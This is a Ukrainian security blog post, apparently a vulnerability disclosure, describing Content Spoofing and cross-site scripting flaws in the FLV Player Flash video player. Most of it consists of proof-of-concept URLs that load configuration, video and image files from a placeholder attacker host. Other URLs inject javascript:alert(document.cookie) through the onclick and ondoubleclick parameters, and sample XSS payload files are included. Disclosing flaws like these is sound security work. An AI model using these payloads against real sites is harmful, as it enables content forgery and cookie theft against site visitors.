Content Spoofing та XSS уразливості в FLV Player
23:59 20.08.201121.04.2011
У лютому, 24.02.2011, я знайшов Content Spoofing та Cross-Site Scripting уразливості в флеш відео плеері FLV Player. Які я виявив на одному сайті, що використовує даний веб додаток. Про що найближчим часом повідомлю розробникам.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.
20.08.2011
Content Spoofing:
Флешки плеєра FLV Player приймають довільні адреси в параметрі configxml, що дозволяє підробити вміст флешки - наприклад, вказавши адресу з файлом конфігурації з іншого сайта.
http://site/player_flv.swf?configxml=http://attacker/1.xml
http://site/player_flv_maxi.swf?configxml=http://attacker/1.xml
http://site/player_flv_multi.swf?configxml=http://attacker/1.xml
Флешки плеєра FLV Player приймають довільні адреси в параметрі config, що дозволяє підробити вміст флешки - наприклад, вказавши адресу з файлом конфігурації з іншого сайта.
http://site/player_flv.swf?config=http://attacker/1.txt
http://site/player_flv_maxi.swf?config=http://attacker/1.txt
http://site/player_flv_multi.swf?config=http://attacker/1.txt
Флешки плеєра FLV Player дозволяють підробити всі важливі параметри, в тому числі flv і startimage, і при цьому приймають довільні адреси в параметрах flv і startimage, що дозволяє підробити вміст флешки - наприклад, вказавши адреси відео і зображення з іншого сайта. А для вказання лінки на довільний сайт можна використати параметри onclick і ondoubleclick.
http://site/player_flv.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_maxi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_multi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_mini.swf?flv=http://attacker/1.flv
XSS:
http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie)
http://site/player_flv_multi.swf?onclick=javascript:alert(document.cookie)
http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(document.cookie)
http://site/player_flv_multi.swf?ondoubleclick=javascript:alert(document.cookie)
http://site/player_flv_maxi.swf?configxml=http://attacker/xss.xml
http://site/player_flv_multi.swf?configxml=http://attacker/xss.xml
Файл xss.xml:
<?xml version="1.0" encoding="UTF-8"?>
<config>
<param name="onclick" value="javascript:alert(document.cookie)" />
<param name="ondoubleclick" value="javascript:alert(document.cookie)" />
</config>
http://site/player_flv_maxi.swf?config=http://attacker/xss.txt
http://site/player_flv_multi.swf?config=http://attacker/xss.txt
Файл xss.txt:
onclick=javascript:alert(document.cookie)
ondoubleclick=javascript:alert(document.cookie)
Коде виконається після кліка (чи подвійного кліка). Це strictly social XSS.
Уразливі версії MINI, NORMAL, MAXI та MULTI плеєра. Зазначу, що версія NORMAL зустрічається під іменами player_flv.swf і player_flv_classic.swf. Автор FLV Player так і не виправив дані уразливості.